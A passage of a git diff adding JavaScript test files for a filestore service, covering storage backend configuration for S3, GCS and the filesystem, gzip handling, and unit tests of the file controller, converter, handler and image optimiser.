Buffer.alloc(10 * 1024 * 1024, 'hello') + const gzippedBody = gzipSync(body) + + /** + * @param {string} key + * @param {Buffer} wantBody + * @param {boolean} autoGunzip + * @return {Promise<void>} + */ + async function checkBodyIsTheSame(key, wantBody, autoGunzip) { + const s = await app.persistor.getObjectStream( + Settings.filestore.stores.user_files, + key, + { autoGunzip } + ) + const buf = new WritableBuffer() + await Stream.promises.pipeline(s, buf) + expect(buf.getContents()).to.deep.equal(wantBody) + } + + if (backendSettings.backend === 'fs') { + it('should refuse to handle autoGunzip', async function () { + await expect( + app.persistor.getObjectStream( + Settings.filestore.stores.user_files, + key, + { autoGunzip: true } + ) + ).to.be.rejectedWith(NotImplementedError) + }) + } else { + it('should return the raw body with gzip', async function () { + await app.persistor.sendStream( + Settings.filestore.stores.user_files, + key, + Stream.Readable.from([gzippedBody]), + { contentEncoding: 'gzip' } + ) + expect( + await app.persistor.getObjectSize( + Settings.filestore.stores.user_files, + key + ) + ).to.equal(gzippedBody.byteLength) + // raw body with autoGunzip=true + await checkBodyIsTheSame(key, body, true) + // gzip body without autoGunzip=false + await checkBodyIsTheSame(key, gzippedBody, false) + }) + it('should return the raw body without gzip compression', async function () { + await app.persistor.sendStream( + Settings.filestore.stores.user_files, + key, + Stream.Readable.from([body]) + ) + expect( + await app.persistor.getObjectSize( + Settings.filestore.stores.user_files, + key + ) + ).to.equal(body.byteLength) + // raw body with both autoGunzip options + await checkBodyIsTheSame(key, body, true) + await checkBodyIsTheSame(key, body, false) + }) + + it('should return the gzip body without gzip header', async function () { + await app.persistor.sendStream( + Settings.filestore.stores.user_files, + key, + Stream.Readable.from([gzippedBody]) + ) + expect( + await app.persistor.getObjectSize( + Settings.filestore.stores.user_files, + key + ) + ).to.equal(gzippedBody.byteLength) + // gzip body with both autoGunzip options + await checkBodyIsTheSame(key, gzippedBody, true) + await checkBodyIsTheSame(key, gzippedBody, false) + }) + } + }) + }) + } +}) diff --git a/services/filestore/test/acceptance/js/TestConfig.js b/services/filestore/test/acceptance/js/TestConfig.js new file mode 100644 index 0000000..3ad4ba4 --- /dev/null +++ b/services/filestore/test/acceptance/js/TestConfig.js @@ -0,0 +1,192 @@ +const fs = require('node:fs') +const Path = require('node:path') +const crypto = require('node:crypto') +const { + RootKeyEncryptionKey, +} = require('@overleaf/object-persistor/src/PerProjectEncryptedS3Persistor') + +const AWS_S3_USER_FILES_STORAGE_CLASS = + process.env.AWS_S3_USER_FILES_STORAGE_CLASS + +// use functions to get a fresh copy, not a reference, each time +function s3BaseConfig() { + return { + endpoint: process.env.AWS_S3_ENDPOINT, + pathStyle: true, + partSize: 100 * 1024 * 1024, + ca: [fs.readFileSync('/certs/public.crt')], + } +} + +function s3Config() { + return { + key: process.env.AWS_ACCESS_KEY_ID, + secret: process.env.AWS_SECRET_ACCESS_KEY, + ...s3BaseConfig(), + } +} + +const S3SSECKeys = [ + new RootKeyEncryptionKey( + crypto.generateKeySync('aes', { length: 256 }).export(), + Buffer.alloc(32) + ), +] + +function s3SSECConfig() { + return { + ...s3Config(), + ignoreErrorsFromDEKReEncryption: false, + automaticallyRotateDEKEncryption: true, + dataEncryptionKeyBucketName: process.env.AWS_S3_USER_FILES_DEK_BUCKET_NAME, + pathToProjectFolder(_bucketName, path) { + const match = path.match(/^[a-f0-9]{24}\//) + if (!match) throw new Error('not a project-folder') + const [projectFolder] = match + return projectFolder + }, + async getRootKeyEncryptionKeys() { + return S3SSECKeys + }, + storageClass: { + [process.env.AWS_S3_USER_FILES_BUCKET_NAME]: + AWS_S3_USER_FILES_STORAGE_CLASS, + }, + } +} + +function s3ConfigDefaultProviderCredentials() { + return { + ...s3BaseConfig(), + } +} + +function s3Stores() { + return { + user_files: process.env.AWS_S3_USER_FILES_BUCKET_NAME, + template_files: process.env.AWS_S3_TEMPLATE_FILES_BUCKET_NAME, + } +} + +function gcsConfig() { + return { + endpoint: { + apiEndpoint: process.env.GCS_API_ENDPOINT, + projectId: 'fake', + }, + directoryKeyRegex: /^[0-9a-fA-F]{24}\/[0-9a-fA-F]{24}/, + unlockBeforeDelete: false, // fake-gcs does not support this + deletedBucketSuffix: '-deleted', + } +} + +function gcsStores() { + return { + user_files: process.env.GCS_USER_FILES_BUCKET_NAME, + template_files: process.env.GCS_TEMPLATE_FILES_BUCKET_NAME, + } +} + +function fsStores() { + return { + user_files: Path.resolve(__dirname, '../../../user_files'), + template_files: Path.resolve(__dirname, '../../../template_files'), + } +} + +function fallbackStores(primaryConfig, fallbackConfig) { + return { + [primaryConfig.user_files]: fallbackConfig.user_files, + [primaryConfig.template_files]: fallbackConfig.template_files, + } +} + +const BackendSettings = { + SHARD_01_FSPersistor: { + backend: 'fs', + stores: fsStores(), + }, + SHARD_01_S3Persistor: { + backend: 's3', + s3: s3Config(), + stores: s3Stores(), + }, + SHARD_01_S3PersistorDefaultProviderCredentials: { + backend: 's3', + s3: s3ConfigDefaultProviderCredentials(), + stores: s3Stores(), + }, + SHARD_01_GcsPersistor: { + backend: 'gcs', + gcs: gcsConfig(), + stores: gcsStores(), + }, + SHARD_01_PerProjectEncryptedS3Persistor: { + backend: 's3SSEC', + s3SSEC: s3SSECConfig(), + stores: s3Stores(), + }, + SHARD_02_FallbackS3ToFSPersistor: { + backend: 's3', + s3: s3Config(), + stores: s3Stores(), + fallback: { + backend: 'fs', + buckets: fallbackStores(s3Stores(), fsStores()), + }, + }, + SHARD_02_FallbackFSToS3Persistor: { + backend: 'fs', + s3: s3Config(), + stores: fsStores(), + fallback: { + backend: 's3', + buckets: fallbackStores(fsStores(), s3Stores()), + }, + }, + SHARD_03_FallbackGcsToS3Persistor: { + backend: 'gcs', + gcs: gcsConfig(), + stores: gcsStores(), + s3: s3Config(), + fallback: { + backend: 's3', + buckets: fallbackStores(gcsStores(), s3Stores()), + }, + }, + SHARD_03_FallbackS3ToGcsPersistor: { + backend: 's3', + // can use the same bucket names for gcs and s3 (in tests) + stores: s3Stores(), + s3: s3Config(), + gcs: gcsConfig(), + fallback: { + backend: 'gcs', + buckets: fallbackStores(s3Stores(), gcsStores()), + }, + }, +} + +function checkForUnexpectedTestFile() { + const awareOfSharding = [ + 'FilestoreApp.js', + 'FilestoreTests.js', + 'TestConfig.js', + 'TestHelper.js', + ] + for (const file of fs.readdirSync(__dirname).sort()) { + if (!awareOfSharding.includes(file)) { + throw new Error( + `Found new test file ${file}: All tests must be aware of the SHARD_ prefix.` + ) + } + } +} +checkForUnexpectedTestFile() + +module.exports = { + AWS_S3_USER_FILES_STORAGE_CLASS, + BackendSettings, + s3Config, + s3SSECConfig, +} diff --git a/services/filestore/test/acceptance/js/TestHelper.js b/services/filestore/test/acceptance/js/TestHelper.js new file mode 100644 index 0000000..384f8aa --- /dev/null +++ b/services/filestore/test/acceptance/js/TestHelper.js @@ -0,0 +1,78 @@ +const streamifier = require('streamifier') +const fetch = require('node-fetch') +const ObjectPersistor = require('@overleaf/object-persistor') + +const { expect } = require('chai') + +module.exports = { + uploadStringToPersistor, + getStringFromPersistor, + expectPersistorToHaveFile, + expectPersistorToHaveSomeFile, + expectPersistorNotToHaveFile, + streamToString, + getMetric, +} + +async function getMetric(filestoreUrl, metric) { + const res = await fetch(`${filestoreUrl}/metrics`) + expect(res.status).to.equal(200) + const metricRegex = new RegExp(`^${metric}{[^}]+} ([0-9]+)$`, 'gm') + const body = await res.text() + let v = 0 + // Sum up size="lt-128KiB" and size="gte-128KiB" + for (const [, found] of body.matchAll(metricRegex)) { + v += parseInt(found, 10) || 0 + } + return v +} + +function streamToString(stream) { + const chunks = [] + return new Promise((resolve, reject) => { + stream.on('data', chunk => chunks.push(chunk)) + stream.on('error', reject) + stream.on('end', () => resolve(Buffer.concat(chunks).toString('utf8'))) + stream.resume() + }) +} + +async function uploadStringToPersistor(persistor, bucket, key, content) { + const fileStream = streamifier.createReadStream(content) + await persistor.sendStream(bucket, key, fileStream) +} + +async function getStringFromPersistor(persistor, bucket, key) { + const stream = await persistor.getObjectStream(bucket, key, {}) + return await streamToString(stream) +} + +async function expectPersistorToHaveFile(persistor, bucket, key, content) { + const foundContent = await getStringFromPersistor(persistor, bucket, key) + expect(foundContent).to.equal(content) +} + +async function expectPersistorToHaveSomeFile(persistor, bucket, keys, content) { + let foundContent + for (const key of keys) { + try { + foundContent = await getStringFromPersistor(persistor, bucket, key) + break + } catch (err) { + if (err instanceof ObjectPersistor.Errors.NotFoundError) { + continue + } + throw err + } + } + if (foundContent === undefined) { + expect.fail(`Could not find any of the specified keys: ${keys}`) + } + expect(foundContent).to.equal(content) +} + +async function expectPersistorNotToHaveFile(persistor, bucket, key) { + await expect( + getStringFromPersistor(persistor, bucket, key) + ).to.eventually.have.been.rejected.with.property('name', 'NotFoundError') +} diff --git a/services/filestore/test/fixtures/test.pdf b/services/filestore/test/fixtures/test.pdf new file mode 100644 index 0000000..b021cc1 Binary files /dev/null and b/services/filestore/test/fixtures/test.pdf differ diff --git a/services/filestore/test/setup.js b/services/filestore/test/setup.js new file mode 100644 index 0000000..744ab91 --- /dev/null +++ b/services/filestore/test/setup.js @@ -0,0 +1,39 @@ +const sinon = require('sinon') +const SandboxedModule = require('sandboxed-module') + +// ensure every ObjectId has the id string as a property for correct comparisons +require('mongodb').ObjectId.cacheHexString = true + +const sandbox = sinon.createSandbox() +const stubs = { + logger: { + debug: sandbox.stub(), + log: sandbox.stub(), + info: sandbox.stub(), + warn: sandbox.stub(), + err: sandbox.stub(), + error: sandbox.stub(), + fatal: sandbox.stub(), + }, +} + +SandboxedModule.configure({ + requires: { + '@overleaf/logger': stubs.logger, + }, + sourceTransformers: { + removeNodePrefix: function (source) { + return source.replace(/require\(['"]node:/g, "require('") + }, + }, +}) + +exports.mochaHooks = { + beforeEach() { + this.logger = stubs.logger + }, + + afterEach() { + sandbox.reset() + }, +} diff --git a/services/filestore/test/unit/js/FileControllerTests.js b/services/filestore/test/unit/js/FileControllerTests.js new file mode 100644 index 0000000..ec56211 --- /dev/null +++ b/services/filestore/test/unit/js/FileControllerTests.js @@ -0,0 +1,336 @@ +const sinon = require('sinon') +const chai = require('chai') +const { expect } = chai +const SandboxedModule = require('sandboxed-module') +const Errors = require('../../../app/js/Errors') +const modulePath = '../../../app/js/FileController.js' + +describe('FileController', function () { + let FileHandler, LocalFileWriter, FileController, req, res, next, stream + const settings = { + s3: { + buckets: { + user_files: 'user_files', + }, + }, + } + const fileSize = 1234 + const fileStream = { + destroy() {}, + } + const projectId = 'projectId' + const fileId = 'file_id' + const bucket = 'user_files' + const key = `${projectId}/${fileId}` + const error = new Error('incorrect utensil') + + beforeEach(function () { + FileHandler = { + copyObject: sinon.stub().yields(), + getFile: sinon.stub().yields(null, fileStream), + getFileSize: sinon.stub().yields(null, fileSize), + deleteFile: sinon.stub().yields(), + deleteProject: sinon.stub().yields(), + insertFile: sinon.stub().yields(), + getDirectorySize: sinon.stub().yields(null, fileSize), + getRedirectUrl: sinon.stub().yields(null, null), + } + + LocalFileWriter = {} + stream = { + pipeline: sinon.stub(), + } + + FileController = SandboxedModule.require(modulePath, { + requires: { + './LocalFileWriter': LocalFileWriter, + './FileHandler': FileHandler, + './Errors': Errors, + stream, + '@overleaf/settings': settings, + '@overleaf/metrics': { + inc() {}, + }, + }, + globals: { console }, + }) + + req = { + key, + bucket, + project_id: projectId, + query: {}, + params: { + project_id: projectId, + file_id: fileId, + }, + headers: {}, + requestLogger: { + setMessage: sinon.stub(), + addFields: sinon.stub(), + }, + } + + res = { + set: sinon.stub().returnsThis(), + sendStatus: sinon.stub().returnsThis(), + status: sinon.stub().returnsThis(), + } + + next = sinon.stub() + }) + + describe('getFile', function () { + it('should try and get a redirect url first', function () { + FileController.getFile(req, res, next) + expect(FileHandler.getRedirectUrl).to.have.been.calledWith(bucket, key) + }) + + it('should pipe the stream', function () { + FileController.getFile(req, res, next) + expect(stream.pipeline).to.have.been.calledWith(fileStream, res) + }) + + it('should send a 200 if the cacheWarm param is true', function (done) { + req.query.cacheWarm = true + res.sendStatus = statusCode => { + statusCode.should.equal(200) + done() + } + FileController.getFile(req, res, next) + }) + + it('should send an error if there is a problem', function () { + FileHandler.getFile.yields(error) + FileController.getFile(req, res, next) + expect(next).to.have.been.calledWith(error) + }) + + describe('with a redirect url', function () { + const redirectUrl = 'https://wombat.potato/giraffe' + + beforeEach(function () { + FileHandler.getRedirectUrl.yields(null, redirectUrl) + res.redirect = sinon.stub() + }) + + it('should redirect', function () { + FileController.getFile(req, res, next) + expect(res.redirect).to.have.been.calledWith(redirectUrl) + }) + + it('should not get a file stream', function () { + FileController.getFile(req, res, next) + expect(FileHandler.getFile).not.to.have.been.called + }) + + describe('when there is an error getting the redirect url', function () { + beforeEach(function () { + FileHandler.getRedirectUrl.yields(new Error('wombat herding error')) + }) + + it('should not redirect', function () { + FileController.getFile(req, res, next) + expect(res.redirect).not.to.have.been.called + }) + + it('should not return an error', function () { + FileController.getFile(req, res, next) + expect(next).not.to.have.been.called + }) + + it('should proxy the file', function () { + FileController.getFile(req, res, next) + expect(FileHandler.getFile).to.have.been.calledWith(bucket, key) + }) + }) + }) + + describe('with a range header', function () { + let expectedOptions + + beforeEach(function () { + expectedOptions = { + bucket, + key, + format: undefined, + style: undefined, + } + }) + + it('should pass range options to FileHandler', function () { + req.headers.range = 'bytes=0-8' + expectedOptions.start = 0 + expectedOptions.end = 8 + + FileController.getFile(req, res, next) + expect(FileHandler.getFile).to.have.been.calledWith( + bucket, + key, + expectedOptions + ) + }) + + it('should ignore an invalid range header', function () { + req.headers.range = 'potato' + FileController.getFile(req, res, next) + expect(FileHandler.getFile).to.have.been.calledWith( + bucket, + key, + expectedOptions + ) + }) + + it("should ignore any type other than 'bytes'", function () { + req.headers.range = 'wombats=0-8' + FileController.getFile(req, res, next) + expect(FileHandler.getFile).to.have.been.calledWith( + bucket, + key, + expectedOptions + ) + }) + }) + }) + + describe('getFileHead', function () { + it('should return the file size in a Content-Length header', function (done) { + res.end = () => { + expect(res.status).to.have.been.calledWith(200) + expect(res.set).to.have.been.calledWith('Content-Length', fileSize) + done() + } + + FileController.getFileHead(req, res, next) + }) + + it('should return a 404 is the file is not found', function (done) { + FileHandler.getFileSize.yields( + new Errors.NotFoundError({ message: 'not found', info: {} }) + ) + + res.sendStatus = code => { + expect(code).to.equal(404) + done() + } + + FileController.getFileHead(req, res, next) + }) + + it('should send an error on internal errors', function () { + FileHandler.getFileSize.yields(error) + + FileController.getFileHead(req, res, next) + expect(next).to.have.been.calledWith(error) + }) + }) + + describe('insertFile', function () { + it('should send bucket name key and res to FileHandler', function (done) { + res.sendStatus = code => { + expect(FileHandler.insertFile).to.have.been.calledWith(bucket, key, req) + expect(code).to.equal(200) + done() + } + FileController.insertFile(req, res, next) + }) + }) + + describe('copyFile', function () { + const oldFileId = 'oldFileId' + const oldProjectId = 'oldProjectid' + const oldKey = `${oldProjectId}/${oldFileId}` + + beforeEach(function () { + req.body = { + source: { + project_id: oldProjectId, + file_id: oldFileId, + }, + } + }) + + it('should send bucket name and both keys to FileHandler', function (done) { + res.sendStatus = code => { + code.should.equal(200) + expect(FileHandler.copyObject).to.have.been.calledWith( + bucket, + oldKey, + key + ) + done() + } + FileController.copyFile(req, res, next) + }) + + it('should send a 404 if the original file was not found', function (done) { + FileHandler.copyObject.yields( + new Errors.NotFoundError({ message: 'not found', info: {} }) + ) + res.sendStatus = code => { + code.should.equal(404) + done() + } + FileController.copyFile(req, res, next) + }) + + it('should send an error if there was an error', function (done) { + FileHandler.copyObject.yields(error) + FileController.copyFile(req, res, err => { + expect(err).to.equal(error) + done() + }) + }) + }) + + describe('delete file', function () { + it('should tell the file handler', function (done) { + res.sendStatus = code => { + code.should.equal(204) + expect(FileHandler.deleteFile).to.have.been.calledWith(bucket, key) + done() + } + FileController.deleteFile(req, res, next) + }) + + it('should send a 500 if there was an error', function () { + FileHandler.deleteFile.yields(error) + FileController.deleteFile(req, res, next) + expect(next).to.have.been.calledWith(error) + }) + }) + + describe('delete project', function () { + it('should tell the file handler', function (done) { + res.sendStatus = code => { + code.should.equal(204) + expect(FileHandler.deleteProject).to.have.been.calledWith(bucket, key) + done() + } + FileController.deleteProject(req, res, next) + }) + + it('should send a 500 if there was an error', function () { + FileHandler.deleteProject.yields(error) + FileController.deleteProject(req, res, next) + expect(next).to.have.been.calledWith(error) + }) + }) + + describe('directorySize', function () { + it('should return total directory size bytes', function (done) { + FileController.directorySize(req, { + json: result => { + expect(result['total bytes']).to.equal(fileSize) + done() + }, + }) + }) + + it('should send a 500 if there was an error', function () { + FileHandler.getDirectorySize.yields(error) + FileController.directorySize(req, res, next) + expect(next).to.have.been.calledWith(error) + }) + }) +}) diff --git a/services/filestore/test/unit/js/FileConverterTests.js b/services/filestore/test/unit/js/FileConverterTests.js new file mode 100644 index 0000000..131bead --- /dev/null +++ b/services/filestore/test/unit/js/FileConverterTests.js @@ -0,0 +1,107 @@ +const sinon = require('sinon') +const chai = require('chai') +const { expect } = chai +const SandboxedModule = require('sandboxed-module') +const { Errors } = require('@overleaf/object-persistor') + +const modulePath = '../../../app/js/FileConverter.js' + +describe('FileConverter', function () { + let SafeExec, FileConverter + const sourcePath = '/data/wombat.eps' + const destPath = '/tmp/dest.png' + const format = 'png' + const errorMessage = 'guru meditation error' + const Settings = { + commands: { + convertCommandPrefix: [], + }, + } + + beforeEach(function () { + SafeExec = { + promises: sinon.stub().resolves(destPath), + } + + const ObjectPersistor = { Errors } + + FileConverter = SandboxedModule.require(modulePath, { + requires: { + './SafeExec': SafeExec, + '@overleaf/metrics': { + inc: sinon.stub(), + Timer: sinon.stub().returns({ done: sinon.stub() }), + }, + '@overleaf/settings': Settings, + '@overleaf/object-persistor': ObjectPersistor, + }, + }) + }) + + describe('convert', function () { + it('should convert the source to the requested format', async function () { + await FileConverter.promises.convert(sourcePath, format) + const args = SafeExec.promises.args[0][0] + expect(args).to.include(`${sourcePath}[0]`) + expect(args).to.include(`${sourcePath}.${format}`) + }) + + it('should return the dest path', async function () { + const destPath = await FileConverter.promises.convert(sourcePath, format) + destPath.should.equal(`${sourcePath}.${format}`) + }) + + it('should wrap the error from convert', async function () { + SafeExec.promises.rejects(errorMessage) + try { + await FileConverter.promises.convert(sourcePath, format) + expect('error should have been thrown').not.to.exist + } catch (err) { + expect(err.name).to.equal('ConversionError') + expect(err.cause.toString()).to.equal(errorMessage) + } + }) + + it('should not accept an non approved format', async function () { + try { + await FileConverter.promises.convert(sourcePath, 'potato') + expect('error should have been thrown').not.to.exist + } catch (err) { + expect(err.name).to.equal('ConversionError') + } + }) + + it('should prefix the command with Settings.commands.convertCommandPrefix', async function () { + Settings.commands.convertCommandPrefix = ['nice'] + await FileConverter.promises.convert(sourcePath, format) + }) + + it('should convert the file when called as a callback', function (done) { + FileConverter.convert(sourcePath, format, (err, destPath) => { + expect(err).not.to.exist + destPath.should.equal(`${sourcePath}.${format}`) + + const args = SafeExec.promises.args[0][0] + expect(args).to.include(`${sourcePath}[0]`) + expect(args).to.include(`${sourcePath}.${format}`) + done() + }) + }) + }) + + describe('thumbnail', function () { + it('should call converter resize with args', async function () { + await FileConverter.promises.thumbnail(sourcePath) + const args = SafeExec.promises.args[0][0] + expect(args).to.include(`${sourcePath}[0]`) + }) + }) + + describe('preview', function () { + it('should call converter resize with args', async function () { + await FileConverter.promises.preview(sourcePath) + const args = SafeExec.promises.args[0][0] + expect(args).to.include(`${sourcePath}[0]`) + }) + }) +}) diff --git a/services/filestore/test/unit/js/FileHandlerTests.js b/services/filestore/test/unit/js/FileHandlerTests.js new file mode 100644 index 0000000..12a2366 --- /dev/null +++ b/services/filestore/test/unit/js/FileHandlerTests.js @@ -0,0 +1,405 @@ +const sinon = require('sinon') +const chai = require('chai') +const { expect } = chai +const modulePath = '../../../app/js/FileHandler.js' +const SandboxedModule = require('sandboxed-module') +const { ObjectId } = require('mongodb') +const { Errors } = require('@overleaf/object-persistor') + +chai.use(require('sinon-chai')) +chai.use(require('chai-as-promised')) + +describe('FileHandler', function () { + let PersistorManager, + LocalFileWriter, + FileConverter, + KeyBuilder, + ImageOptimiser, + FileHandler, + Settings, + fs + + const bucket = 'my_bucket' + const key = `${new ObjectId()}/${new ObjectId()}` + const convertedFolderKey = `${new ObjectId()}/${new ObjectId()}` + const projectKey = `${new ObjectId()}/` + const sourceStream = 'sourceStream' + const convertedKey = 'convertedKey' + const redirectUrl = 'https://wombat.potato/giraffe' + const readStream = { + stream: 'readStream', + on: sinon.stub(), + } + + beforeEach(function () { + PersistorManager = { + getObjectStream: sinon.stub().resolves(sourceStream), + getRedirectUrl: sinon.stub().resolves(redirectUrl), + checkIfObjectExists: sinon.stub().resolves(), + deleteObject: sinon.stub().resolves(), + deleteDirectory: sinon.stub().resolves(), + sendStream: sinon.stub().resolves(), + insertFile: sinon.stub().resolves(), + sendFile: sinon.stub().resolves(), + directorySize: sinon.stub().resolves(), + } + LocalFileWriter = { + // the callback style is used for detached cleanup calls + deleteFile: sinon.stub().yields(), + promises: { + writeStream: sinon.stub().resolves(), + deleteFile: sinon.stub().resolves(), + }, + } + FileConverter = { + promises: { + convert: sinon.stub().resolves(), + thumbnail: sinon.stub().resolves(), + preview: sinon.stub().resolves(), + }, + } + KeyBuilder = { + addCachingToKey: sinon.stub().returns(convertedKey), + getConvertedFolderKey: sinon.stub().returns(convertedFolderKey), + } + ImageOptimiser = { + promises: { + compressPng: sinon.stub().resolves(), + }, + } + Settings = { + filestore: { + stores: { template_files: 'template_files', user_files: 'user_files' }, + }, + } + fs = { + createReadStream: sinon.stub().returns(readStream), + } + + const ObjectPersistor = { Errors } + + FileHandler = SandboxedModule.require(modulePath, { + requires: { + './PersistorManager': PersistorManager, + './LocalFileWriter': LocalFileWriter, + './FileConverter': FileConverter, + './KeyBuilder': KeyBuilder, + './ImageOptimiser': ImageOptimiser, + '@overleaf/settings': Settings, + '@overleaf/object-persistor': ObjectPersistor, + '@overleaf/metrics': { + gauge: sinon.stub(), + Timer: sinon.stub().returns({ done: sinon.stub() }), + }, + fs, + }, + globals: { console, process }, + }) + }) + + describe('insertFile', function () { + const stream = 'stream' + + it('should send file to the filestore', function (done) { + FileHandler.insertFile(bucket, key, stream, err => { + expect(err).not.to.exist + expect(PersistorManager.sendStream).to.have.been.calledWith( + bucket, + key, + stream + ) + done() + }) + }) + + it('should not make a delete request for the convertedKey folder', function (done) { + FileHandler.insertFile(bucket, key, stream, err => { + expect(err).not.to.exist + expect(PersistorManager.deleteDirectory).not.to.have.been.called + done() + }) + }) + + it('should accept templates-api key format', function (done) { + KeyBuilder.getConvertedFolderKey.returns( + '5ecba29f1a294e007d0bccb4/v/0/pdf' + ) + FileHandler.insertFile(bucket, key, stream, err => { + expect(err).not.to.exist + done() + }) + }) + + it('should throw an error when the key is in the wrong format', function (done) { + KeyBuilder.getConvertedFolderKey.returns('wombat') + FileHandler.insertFile(bucket, key, stream, err => { + expect(err).to.exist + done() + }) + }) + }) + + describe('deleteFile', function () { + it('should tell the filestore manager to delete the file', function (done) { + FileHandler.deleteFile(bucket, key, err => { + expect(err).not.to.exist + expect(PersistorManager.deleteObject).to.have.been.calledWith( + bucket, + key + ) + done() + }) + }) + + it('should not tell the filestore manager to delete the cached folder', function (done) { + FileHandler.deleteFile(bucket, key, err => { + expect(err).not.to.exist + expect(PersistorManager.deleteDirectory).not.to.have.been.called + done() + }) + }) + + it('should accept templates-api key format', function (done) { + KeyBuilder.getConvertedFolderKey.returns( + '5ecba29f1a294e007d0bccb4/v/0/pdf' + ) + FileHandler.deleteFile(bucket, key, err => { + expect(err).not.to.exist + done() + }) + }) + + it('should throw an error when the key is in the wrong format', function (done) { + KeyBuilder.getConvertedFolderKey.returns('wombat') + FileHandler.deleteFile(bucket, key, err => { + expect(err).to.exist + done() + }) + }) + + describe('when conversions are enabled', function () { + beforeEach(function () { + Settings.enableConversions = true + }) + + it('should delete the convertedKey folder for template files', function (done) { + FileHandler.deleteFile( + Settings.filestore.stores.template_files, + key, + err => { + expect(err).not.to.exist + expect(PersistorManager.deleteDirectory).to.have.been.calledWith( + Settings.filestore.stores.template_files, + convertedFolderKey + ) + done() + } + ) + }) + + it('should not delete the convertedKey folder for user files', function (done) { + FileHandler.deleteFile( + Settings.filestore.stores.user_files, + key, + err => { + expect(err).not.to.exist + expect(PersistorManager.deleteDirectory).to.not.have.been.called + done() + } + ) + }) + }) + }) + + describe('deleteProject', function () { + it('should tell the filestore manager to delete the folder', function (done) { + FileHandler.deleteProject(bucket, projectKey, err => { + expect(err).not.to.exist + expect(PersistorManager.deleteDirectory).to.have.been.calledWith( + bucket, + projectKey + ) + done() + }) + }) + + it('should throw an error when the key is in the wrong format', function (done) { + FileHandler.deleteProject(bucket, 'wombat', err => { + expect(err).to.exist + done() + }) + }) + }) + + describe('getFile', function () { + it('should return the source stream no format or style are defined', function (done) { + FileHandler.getFile(bucket, key, null, (err, stream) => { + expect(err).not.to.exist + expect(stream).to.equal(sourceStream) + done() + }) + }) + + it('should pass options through to PersistorManager', function (done) { + const options = { start: 0, end: 8 } + FileHandler.getFile(bucket, key, options, err => { + expect(err).not.to.exist + expect(PersistorManager.getObjectStream).to.have.been.calledWith( + bucket, + key, + options + ) + done() + }) + }) + + describe('when a format is defined', function () { + let result + + describe('when the file is not cached', function () { + beforeEach(function (done) { + FileHandler.getFile(bucket, key, { format: 'png' }, (err, stream) => { + result = { err, stream } + done() + }) + }) + + it('should convert the file', function () { + expect(FileConverter.promises.convert).to.have.been.called + }) + + it('should compress the converted file', function () { + expect(ImageOptimiser.promises.compressPng).to.have.been.called + }) + + it('should return the the converted stream', function () { + expect(result.err).not.to.exist + expect(result.stream).to.equal(readStream) + expect(PersistorManager.getObjectStream).to.have.been.calledWith( + bucket, + key + ) + }) + }) + + describe('when the file is cached', function () { + beforeEach(function (done) { + PersistorManager.checkIfObjectExists = sinon.stub().resolves(true) + FileHandler.getFile(bucket, key, { format: 'png' }, (err, stream) => { + result = { err, stream } + done() + }) + }) + + it('should not convert the file', function () { + expect(FileConverter.promises.convert).not.to.have.been.called + }) + + it('should not compress the converted file again', function () { + expect(ImageOptimiser.promises.compressPng).not.to.have.been.called + }) + + it('should return the cached stream', function () { + expect(result.err).not.to.exist + expect(result.stream).to.equal(sourceStream) + expect(PersistorManager.getObjectStream).to.have.been.calledWith( + bucket, + convertedKey + ) + }) + }) + }) + + describe('when a style is defined', function () { + it('generates a thumbnail when requested', function (done) { + FileHandler.getFile(bucket, key, { style: 'thumbnail' }, err => { + expect(err).not.to.exist + expect(FileConverter.promises.thumbnail).to.have.been.called + expect(FileConverter.promises.preview).not.to.have.been.called + done() + }) + }) + + it('generates a preview when requested', function (done) { + FileHandler.getFile(bucket, key, { style: 'preview' }, err => { + expect(err).not.to.exist + expect(FileConverter.promises.thumbnail).not.to.have.been.called + expect(FileConverter.promises.preview).to.have.been.called + done() + }) + }) + }) + }) + + describe('getRedirectUrl', function () { + beforeEach(function () { + Settings.filestore = { + allowRedirects: true, + stores: { + userFiles: bucket, + }, + } + }) + + it('should return a redirect url', function (done) { + FileHandler.getRedirectUrl(bucket, key, (err, url) => { + expect(err).not.to.exist + expect(url).to.equal(redirectUrl) + done() + }) + }) + + it('should call the persistor to get a redirect url', function (done) { + FileHandler.getRedirectUrl(bucket, key, () => { + expect(PersistorManager.getRedirectUrl).to.have.been.calledWith( + bucket, + key + ) + done() + }) + }) + + it('should return null if options are supplied', function (done) { + FileHandler.getRedirectUrl( + bucket, + key, + { start: 100, end: 200 }, + (err, url) => { + expect(err).not.to.exist + expect(url).to.be.null + done() + } + ) + }) + + it('should return null if the bucket is not one of the defined ones', function (done) { + FileHandler.getRedirectUrl('a_different_bucket', key, (err, url) => { + expect(err).not.to.exist + expect(url).to.be.null + done() + }) + }) + + it('should return null if redirects are not enabled', function (done) { + Settings.filestore.allowRedirects = false + FileHandler.getRedirectUrl(bucket, key, (err, url) => { + expect(err).not.to.exist + expect(url).to.be.null + done() + }) + }) + }) + + describe('getDirectorySize', function () { + it('should call the filestore manager to get directory size', function (done) { + FileHandler.getDirectorySize(bucket, key, err => { + expect(err).not.to.exist + expect(PersistorManager.directorySize).to.have.been.calledWith( + bucket, + key + ) + done() + }) + }) + }) +}) diff --git a/services/filestore/test/unit/js/ImageOptimiserTests.js b/services/filestore/test/unit/js/ImageOptimiserTests.js new file mode 100644 index 0000000..cec7da6 --- /dev/null +++ b/services/filestore/test/unit/js/ImageOptimiserTests.js @@ -0,0 +1,67 @@ +const sinon = require('sinon') +const chai = require('chai') +const { expect } = chai +const modulePath = '../../../app/js/ImageOptimiser.js' +const { FailedCommandError } = require('../../../app/js/Errors') +const SandboxedModule = require('sandboxed-module') + +describe('ImageOptimiser', function () { + let ImageOptimiser, SafeExec + const sourcePath = '/wombat/potato.eps' + + beforeEach(function () { + SafeExec = { + promises: sinon.stub().resolves(), + } + ImageOptimiser = SandboxedModule.require(modulePath, { + requires: { + './SafeExec': SafeExec, + '@overleaf/metrics': { + Timer: sinon.stub().returns({ done: sinon.stub() }), + }, + }, + }) + }) + + describe('compressPng', function () { + it('should convert the file', function (done) { + ImageOptimiser.compressPng(sourcePath, err => { + expect(err).not.to.exist + expect(SafeExec.promises).to.have.been.calledWith([ + 'optipng', + sourcePath, + ]) + done() + }) + }) + + it('should return the error', function (done) { + SafeExec.promises.rejects('wombat herding failure') + ImageOptimiser.compressPng(sourcePath, err => { + expect(err.toString()).to.equal('wombat herding failure') + done() + }) + }) + }) + + describe('when optimiser is sigkilled', function () { + const expectedError = new FailedCommandError('', 'SIGKILL', '', '') + let error + + beforeEach(function (done) { + SafeExec.promises.rejects(expectedError) + ImageOptimiser.compressPng(sourcePath, err => { + 